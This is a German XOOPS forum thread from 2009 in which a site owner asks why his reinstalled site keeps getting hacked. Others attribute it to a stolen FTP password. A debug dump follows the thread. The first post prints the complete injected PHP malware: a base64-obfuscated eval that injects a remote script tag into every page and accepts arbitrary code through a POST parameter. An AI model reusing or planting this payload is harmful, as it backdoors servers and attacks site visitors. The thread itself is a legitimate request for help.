Fork me on GitHub
"XOOPS ist ein dynamisches OO (Objekt Orientiertes) open source Portal Script geschrieben in PHP. XOOPS ist ein ideales CMS (Content Management System) für den Aufbau von kleineren und grösseren Communities, Firmen-, Intra- und Internet-Portale, Web-Logs und vieles mehr."
forum
Bitte schaut in die DOKUMENTATION oder benutzt die SUCHFUNKTION bevor Ihr Eure Fragen im Forum stellt. Viele Fragen wurden bereits gestellt.

Leser in diesem Thema:   1 Anonyme(r)


(1) 2 »


Neue Seite nach ein paar Stunden gehackt
#1
Benutzerinformationen
Hallo.

Nach langem hin und her hab ich jetzt mal mein Xoops komplett neu installiert. Einmal Version 2.3.3 und einmal 2.3.2b.
Und nach ein paar Stunden ging immer gar nichts mehr. Immer das selbe. Vorallem in den Index.html und in ein paar .php Dateien steht im Kopf immer folgendes:

<?php eval(base64_decode('aWYoIWlzc2V0KCRsZnJqcDEpKXtmdW5jdGlvbiBsZnJqcCgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJGMWRHOWpZWEl1WldVdmFXMWhaMlZ6TDJkdmIyZHNaVEV5TXprellUSTBORGc0WldKaU56QXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gbGZyanAyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGxmcmpwMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkbGZyanAxKSljYWxsX3VzZXJfZnVuYygkbGZyanAxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2xmcmpwJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2xmcmpwJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGxmcmpwbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignbGZyanAyJykpIT0nbGZyanAyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php


Warum kann ich mir nicht erklären. Ich hab auf dem Webserver komplett alle Dateien aus dem html Ordner gelöscht es war also nur noch Xoops drauf. Im Protector wurde alles grün also sicher angezeigt. Bei jeder Neuinstallation hab ich eine neue MySQL Datenbank angelegt und Passwörter gändert. Module waren nur Protector und WF-Downloads 3.2 und mal 3.1 installiert.

Hat jemand eine Ahnung wie das sein kann? Bin echt am verzweifeln :(


Geschrieben: 20.10.2009
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#2
Benutzerinformationen
Hallo!

Vermutlich kennt jemand das Passwort von deinem FTP.

Chris

Geschrieben: 20.10.2009
_________________
PersonalBit | Formel 1
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#3
Benutzerinformationen
... oder der Webserver selbst ist das Problem.

Geschrieben: 20.10.2009
_________________
if(ahnung == 0) {use SEARCH; use BRAIN; use GOOGLE; } else {make post;}
Wie man Fragen richtig stellt
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#4
Benutzerinformationen
geht zu einem russischen Server, denke mal das der nicht mehr so frisch ist

Auch ist zu 99,9% nicht XOOPS dafür verantwortlich,
entweder dein Rechner (Keylogger o.ä.) oder der Server selbst.

Geschrieben: 20.10.2009
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#5
Benutzerinformationen
Ok. Jetzt scheint alles wieder zu passen.

Wahrscheinlich hat irgend ein Bot mein FTP Passwort gehackt.. XOOPS war unschuldig :)

Geschrieben: 23.10.2009
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#6
Benutzerinformationen
Zitat:

double09 schrieb:
Wahrscheinlich hat irgend ein Bot mein FTP Passwort gehackt..


Mir wäre das zu heiss , oder weisst du es genau?

Geschrieben: 23.10.2009
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#7
Benutzerinformationen
Hallo zusammen

Ein Bekannter hatte genau dieses Problem, in der Tat ist (wer auch immer) an das FTP Passwort gekommen. Das Problem lag auf seinem Rechner, er hatte sich, daran konnte er sich zumindest erinnern, irgendein "Anti-Sypware Programm" geladen, dass diesen Hybrid verteilt hat und nach Russland telefonierte! Er hatte auch kein XOOPS im Einsatz, daher kann man XOOPS an der Stelle fast sicher aus der Linie nehmen, was Sicherheit oder Lücke betrifft!

Gruß

Geschrieben: 23.10.2009
_________________
website
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#8
Benutzerinformationen
meine Antwort bezog sich nicht aufs XOOPS

Geschrieben: 23.10.2009
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#9
Benutzerinformationen
Meine Antwort im wesentlichen auch nicht Alfred
Schönes WE

Gruß

Geschrieben: 23.10.2009
_________________
website
Erstelle PDF des Beitrags Drucke

Aw:: Neue Seite nach ein paar Stunden gehackt
#10
Benutzerinformationen
Ich gehe davon aus, dass mein Passwort rausgefunden wurde da ich auf dem Webhost jahrelang keine wichtigen Files liegen hatte und deswegen dort auch nur ein ziemlich simples Passwort angelegt hatte.

Vor der Passwortänderung wäre die Seite bestimmt schon wieder 10 mal down gewesen ;)

Jetzt hab ich ein ziemlich sicheres Passwort und alles scheint bis jetzt ok zu sein.

Geschrieben: 23.10.2009
Erstelle PDF des Beitrags Drucke







[Erweiterte Suche]


Fehler
Warnung: syntax error, unexpected END_OF_LINE, expecting '=' in /var/www/clients/client1/web3/security/myxoops/xoops_data/configs/xoRewriteHtaccess.ini.php on line 13 in Datei /class/smarty/xoops_plugins/xoSmartyFunctions.php Zeile 32
Warnung: array_key_exists() expects parameter 2 to be array, boolean given in Datei /class/smarty/xoops_plugins/xoSmartyFunctions.php Zeile 34
Warnung: XoSmartyPlugin : section [xoRewriteHtaccess] does not exist in /configs/xoRewriteHtaccess.ini.php in Datei /class/smarty/xoops_plugins/xoSmartyFunctions.php Zeile 42
abgelehnt
Abfragen
0.000106 - SET NAMES 'utf8'
0.000066 - SET SQL_BIG_SELECTS = 1
0.000119 - SELECT * FROM config WHERE (conf_modid = '0' AND conf_catid = '1') ORDER BY conf_order ASC
0.000299 - SELECT sess_data, sess_ip FROM session WHERE sess_id = '3hsantt2mmmckeam44koj6lsn6'
0.000084 - SELECT * FROM modules WHERE dirname = 'newbb'
0.000076 - SELECT COUNT(*) FROM group_permission WHERE (gperm_modid = '1' AND (gperm_groupid = '3') AND gperm_name = 'module_read' AND gperm_itemid = '2')
0.000104 - SELECT * FROM config WHERE (conf_modid = '2') ORDER BY conf_order ASC
0.000083 - SELECT * FROM modules WHERE dirname = 'protector'
0.000198 - DELETE FROM protector_access WHERE expire < UNIX_TIMESTAMP()
0.000276 - SELECT COUNT(*) FROM protector_access WHERE ip='54.161.181.49' AND request_uri='/forum/viewtopic.php?post_id=61828'
0.000181 - SELECT COUNT(*) FROM protector_access WHERE ip='54.161.181.49'
0.000208 - INSERT INTO protector_access SET ip='54.161.181.49',request_uri='/forum/viewtopic.php?post_id=61828',expire=UNIX_TIMESTAMP()+'60'
0.000091 - SELECT * FROM modules WHERE dirname = 'xoopspoll'
0.000091 - SELECT * FROM modules WHERE dirname = 'umfrage'
0.000287 - SELECT t.* FROM bb_topics t, bb_posts p WHERE t.topic_id = p.topic_id AND p.post_id = 61828
0.000081 - SELECT * FROM bb_forums WHERE forum_id = '72'
0.000096 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'category_access')
0.000150 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_access')
0.000169 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_view')
0.000444 - SELECT COUNT(*) FROM `bb_posts` WHERE (topic_id = '11684' AND approved = '1')
0.000271 - SELECT COUNT(*) FROM bb_posts AS p WHERE p.topic_id=11684 AND p.approved = 1 AND p.post_id < 61828
0.001105 - SELECT p.*, t.* FROM bb_posts p, bb_posts_text t WHERE p.topic_id=11684 AND p.post_id = t.post_id AND p.approved = 1 ORDER BY p.post_id ASC LIMIT 0, 10
0.000245 - UPDATE bb_topics SET topic_views = topic_views + 1 WHERE topic_id =11684
0.000088 - SELECT * FROM config WHERE (conf_modid = '0' AND conf_catid = '3') ORDER BY conf_order ASC
0.000084 - SELECT DISTINCT gperm_itemid FROM group_permission WHERE gperm_name = 'block_read' AND gperm_modid = 1 AND gperm_groupid IN (3)
0.000080 - SELECT b.* FROM newblocks b, block_module_link m WHERE m.block_id=b.bid AND b.isactive=1 AND b.visible=1 AND m.module_id IN (0,2) AND b.bid IN (31,30,29,28,27,26,25,24,23,22,21,18,17,16,49,15,14,13,10,7,5,3,2,20,19,48,38,37,36,41,40,35,45,44,46,47,50,51,52) ORDER BY b.weight, m.block_id
0.000204 - DELETE FROM lastseen WHERE (uid<1 AND time<=1414226323) OR (uid>0 AND time<=1413621823)
0.000134 - UPDATE lastseen SET online=0 WHERE uid>0 AND time< 1414226323
0.000073 - SELECT * FROM modules WHERE dirname = 'onlinehistory'
0.000070 - SELECT * FROM config WHERE (conf_modid = '7') ORDER BY conf_order ASC
0.000284 - SELECT count(uid) as cuid FROM lastseen WHERE uid=0 AND ip='54.161.181.49'
0.000184 - INSERT INTO lastseen (uid, username, time, ip, online, uagent, module) VALUES (0, 'Besucher', 1414226623, '54.161.181.49', 1, 'CCBot/2.0 (http://commoncrawl.org/faq/)', 2)
0.000207 - SELECT COUNT(uid) as count FROM lastseen WHERE (online > '0' AND uid > '-1')
0.000128 - DELETE FROM bb_online WHERE online_updated < 1414226323
0.000129 - DELETE FROM online WHERE online_updated < 1414226323
0.000198 - SELECT COUNT(*) FROM online WHERE online_uid=0 AND online_ip='54.161.181.49'
0.000152 - INSERT INTO online (online_uid, online_uname, online_updated, online_ip, online_module) VALUES (0, '', 1414226623, '54.161.181.49', 2)
0.000165 - SELECT COUNT(*) FROM bb_online WHERE online_uid=0 AND online_ip='54.161.181.49'
0.000152 - INSERT INTO bb_online (online_uid, online_uname, online_updated, online_ip, online_forum, online_topic) VALUES (0, '', 1414226623, '54.161.181.49', 72, 11684)
0.000351 - DELETE FROM bb_online WHERE ( online_uid > 0 AND online_uid NOT IN ( SELECT online_uid FROM online WHERE online_module =2 ) ) OR ( online_uid = 0 AND online_ip NOT IN ( SELECT online_ip FROM online WHERE online_module =2 AND online_uid = 0 ) )
0.000175 - SELECT * FROM bb_online WHERE online_topic = '11684'
0.000077 - SELECT * FROM bb_type WHERE type_id = '3'
0.000069 - SELECT cat_title, cat_id FROM bb_categories WHERE cat_id = '2'
0.000116 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_post')
0.000135 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.001420 - SELECT * FROM `users` WHERE uid IN (11791,10394,7492,8758,10185)
0.000082 - SELECT * FROM smiles
0.000220 - SELECT online_uid FROM bb_online WHERE online_uid IN (7492, 8758, 10185, 10394, 11791)
0.000072 - SELECT * FROM ranks
0.000959 - SELECT user_digests, uid FROM bb_user_stats WHERE uid IN( 7492, 8758, 10185, 10394, 11791)
0.000129 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000122 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000150 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000121 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000168 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000150 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000142 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000113 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000154 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000127 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000117 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000127 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000135 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000116 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000126 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000140 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000113 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000130 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000163 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000119 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000135 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000141 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000117 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000126 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000132 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000155 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000131 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000154 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_edit')
0.000115 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_delete')
0.000127 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
0.000083 - SELECT * FROM modules WHERE dirname = 'xoopspoll'
0.000130 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_addpoll')
0.000154 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_addpoll')
0.000092 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'category_access')
0.000077 - SELECT `cat_id`, `cat_order`, `cat_title` FROM `bb_categories` WHERE cat_id IN (9, 20, 12, 17, 19, 21, 2) ORDER BY cat_order ASC
0.000154 - SELECT * FROM group_permission WHERE (gperm_modid = '2' AND gperm_name = 'forum_reply')
Zusammen: 86
Blöcke
Online Historie Zählblock: nicht zwischengespeichert
Zusammen: 1
Extras
plugin smarty for xoops => xoRewriteModule : Loaded
plugin smarty for xoops => xoRewriteModule : Loaded
inbegriffene Dateien: 161 Dateien
Speicher: 12674192 bytes
Zeitmessung
XOOPS brauchte 0.607 Sekunden zum laden.
XOOPS Boot brauchte 0.027 Sekunden zum laden.
Module init brauchte 0.068 Sekunden zum laden.
XOOPS output init brauchte 0.013 Sekunden zum laden.
Module display brauchte 0.479 Sekunden zum laden.
Page rendering brauchte 0.020 Sekunden zum laden.